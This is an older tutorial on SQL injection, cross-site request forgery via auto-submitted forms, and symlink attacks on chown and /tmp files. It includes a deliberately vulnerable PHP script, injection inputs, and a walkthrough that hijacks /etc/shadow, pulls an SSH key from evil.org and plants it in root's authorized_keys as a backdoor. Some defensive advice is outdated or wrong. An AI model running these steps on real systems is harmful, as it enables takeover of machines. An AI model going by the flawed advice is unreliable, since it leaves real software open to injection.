SQL injection attacks are the result of turning a data stream into a command stream. SQL commands are issued to the server in the form of queries. SELECT * FROM users would be a query. The problem arises whenever an attacker can insert their own additions to a command. A sample vulnerable query would be SELECT * FROM users WHERE id = $VAR. Let's take a look at a vulnerable script.
The database. Welcome to the MySQL monitor. Commands end with ; or g. Your MySQL connection id is 21 to server version: 4.0.18 Type 'help;' or 'h' for help. Type 'c' to clear the buffer. mysql> use hn; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> describe items; +----------+---------+------+-----+---------+----------------+ | Field | Type | Null | Key | Default | Extra | +----------+---------+------+-----+---------+----------------+ | id | int(11) | | PRI | NULL | auto_increment | | score | float | YES | | NULL | | | numvotes | int(11) | YES | | NULL | | | body | text | YES | | NULL | | +----------+---------+------+-----+---------+----------------+ 4 rows in set (0.01 sec) mysql>
<?
mysql_pconnect("localhost","user","pass") or die(mysql_error());
mysql_select_db("db") or die("2: Could not select database.
");
$var1 = $_POST['var1'];
if ($var1)
{
$query = "SELECT * FROM items WHERE id=$var1";
$qrh = mysql_query($query);
if ($qrh)
{
$nrows = mysql_num_rows($qrh);
echo $nrows;
}
}
?>
From this improperly written PHP page, we can specify an integer to lookup that ID. If this was login code, it would probably check to see if the number of rows returned was > 1 or equal to 1. In order to do this we could make the SELECT statement grab more rows by always evaluating to true. We would do this by appending OR 1 to the end of the query. So on the input form we would put 5 OR 1. The entire query would be FROM items WHERE id=5 OR 1, which would select every row in the table.
The correct way to prevent such an attack of adding additional parts to the query would be to tick all the variables with single tics. Here is the script again, but written without the flaw.
<?
mysql_pconnect("localhost","user","pass") or die(mysql_error());
mysql_select_db("db") or die("2: Could not select database.
");
$var1 = $_POST['var1'];
if ($var1)
{
$query = "SELECT * FROM items WHERE id='$var1'";
$qrh = mysql_query($query);
if ($qrh)
{
$nrows = mysql_num_rows($qrh);
echo $nrows;
}
}
?>
Although ticing a variable is all you need to do with PHP and mysql, other languages don't have the security features that PHP has for mysql. You might have been thinking on the same lines as so many others about the ticing. What happens if they tic the variable, and I untic it. Say the query is SELECT * FROM items WHERE id = '$var1'. What if I set $var1 to be 1' OR 1. In PHP this will have no effect because PHP will automatically escape your ' so it has no effect on the query. Other languages don't do this automatically and they rely on the programmer knowing all the ways the query can be altered.
A more advanced technique involves using subqueries. The tactic here is to wrap in another query into the one you are modifying. Not all SQL servers support this, so if the server is MySQL, it will need to be version 4.1 or greater. Most SQL servers support it, and it is a very powerful technique for extracting data. The only challenge is that you must comply with the type constraints of the query. So if the query is set to return a record, you must return the same kind of record. In a field, you must return the same type that the record is expecting.
A good article on SQL injection is located here http://www.securiteam.com/securityreviews/5DP0N1P76E.html
Web browsers provide an interesting opportunity to attack users. If an attacker wants access to joeuser's bank account at xyzbank.com, then all he has to do according to the principles of exploitation is to be able to run code as joeuser. Whenever joeuser is exploited, the attacker will have full control over joeuser's xyzbank.com account. To the observant reader who may have thought of this by this time, an easy opportunity is provided. That opportunity is joeuser's webbrowser.
Internet browsing software has advanced very quickly, and now most software is so complicated that fully working programs can easily be created in webpages with java and vbscript. Add to this the ability to communicate with the local file system and the network through automatic link loading via IMG tags, or java script links, and you have the power to do almost anything. One of the real points of weakness, and power to the attacker, is the fact that FORM submissions are just regular requests.
The most direct form of cross site scripting is finding a way to insert commands into a website that already lets users add content to it. In this case if the user can craft a set of specially designed code for that site, they can make visitors run code that could do anything to the page, make them load other page, submit forms, send back data to the site, or just about anything imaginable. The most common use of this is filling out forms. An attacker will craft a page such that it has a form setup in it, and it will be submitted with javascript. To the victim, they will barely notice anything, until they see they posted an embarrassing message on a board, bought thousands of dollars worth of merchandise, or divulged confidential information on a private website. The characteristics of this attack are the additions to the actual webpage, and the ability to prevent the attack by filtering data on both ends.
The less direct method of attack is to create links for a user to press. The trick here is in how forms are created and processed. For a form using the GET method, there is nothing to stop someone from creating a link that sends variables to it. The webserver has no way to differentiate the difference between a submitted form and a clicked link. To it a form with the field test set to value is exactly the same as file.php?test=value. Although this was in the form of a GET request, which is differentiable from a POST request, it is only a trivial modification to make a form submit something to any site. This attack does not occur by modifying the server page. Detection is thus more difficult, and the server must be ready to handle the case where requests are not correctly referred.
Site attacks of cross site scripting are fairly well documented in this FAQ http://www.cgisecurity.com/articles/xss-faq.shtml. Client attacks of linking to filled out forms are less documented.
As if security wasn't hard enough having to worry about buffer overflows, correct usage of format strings, possible timing issues, and validating input. What if you went to write to a file, but you weren't really writing to it? Unfortunately that is all too easy to occur in a system. The problem is the ability to form a link to another file. In UNIX and Linux they come in two varieties, hard and soft. Hard links are actually part of the filesystem. With it there is actually a new pointer to all the blocks that the file is stored in, and there is not a way to tell that it is a link. Soft links on the other hand are actually just files with the full path to the linked file in them. Although the two are vastly different, they operate in the same manner under most circumstances. The difference is the functions that allow a program to check if a file is a link do not work with hardlinks. Protecting against softlinks is a job for the application. Hardlinks must be protected in the kernel by disallowing users to link to files they don't have access to.
A major piece of software is vulnerable to this flaw, that major utility is the ch* package. The problem with all of the ch* utilities is that they default to following links, even when operating recursively. It might not sound like such a bad thing initially, but when you realize that a chown -R user ~user can fatally compromise your system, it does start to sound like a bad thing. A simple link to /etc/shadow with ln -s /etc/shadow ~user/testfile by user would let him take ownership of the shadow file, if he could convince the administrator to run a similar command.
Any software that is run on files that may have been created by another user are subject to similar abuses. The most common directory for this is /tmp, because everyone uses it, and everyone can write to it. Combining the two of those, it means that other users can potentially provide input to a program you are running. In order to check a file to see if it is a link, you should open it and use its fd for all the checks you wish to run, including fstat to determine if it is a link. If you do not use the f* calls then you are going to open the program up to a race condition between the time you check the file, and when you reopen it.
A sample exploitation of the ch* utilities follows here.
$ ln -s /etc/shadow testfile
User calls administrator, says that that they need ownership of all files in their directory because the webserver wrote back some files owned by www as part of their CGI script. The administrator is bothered but just does the job quickly to get the user off the phone.
# chown -R user ~user
User realizes that he now can do whatever he wants with the shadow file, so he copies down the root shadow entry, changes it to match his. He then logs in as root, and changes back the root shadow entry to what it was before, and backdoors the system. Attacker has chown'ed system.
$ grep root /etc/shadow $ grep user /etc/shadow $ vi /etc/shadow $ su password: # scp user@evil.org:sshkey . # cat sshkey >> ~root/.ssh/authorized_keys # rm sshkey # vi /etc/shadow # chmod root /etc/shadow # rm ~user/testfile # exit $
#includeint main(int argc, char ** argv) { FILE * fd; if (argc <= 1) exit(1); if ((fd = fopen("/tmp/tool.temp","a")) == NULL) { exit(1); } fprintf(fd,"%s",argv[1]); fclose(fd); return 0; }
Give the tool above, if the attacker creates a link called /tmp/tool.temp to some other file, he can get the administrator to append data to it. Depending on what file the attacker links to, and what gets appended this could either crash the system, or even give the attacker root. The following is an attack on the tool.
$ ln -s /bin/login /tmp/tool.temp
The attacker waits for the administrator to run the tool. As soon as he does, /bin/login is corrupt, and the system is unusable.